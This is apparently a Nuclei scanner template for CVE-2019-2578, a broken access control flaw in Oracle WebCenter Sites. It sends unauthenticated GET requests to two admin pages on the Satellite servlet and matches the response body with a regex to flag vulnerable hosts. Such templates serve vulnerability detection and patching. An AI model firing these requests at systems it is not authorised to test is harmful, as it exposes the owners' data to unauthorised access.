id: CVE-2019-2578

info:
  name: Oracle WebCenter Sites - Broken Access Control
  author: leovalcante
  severity: high
  description: Oracle WebCenter Sites 12.2.1.3.0 (a component of Oracle Fusion Middleware) suffers from broken access control. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data.
  reference:
    - https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
    - https://nvd.nist.gov/vuln/detail/CVE-2019-2578
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2019-2578
  tags: cve,cve2019,oracle,wcs,auth-bypass

requests:
  - raw:
      - |
        GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true
    matchers:
      - type: regex
        part: body
        regex:
          - '<script[\d\D]*<throwexception/>'


# Enhanced by mp on 2022/05/04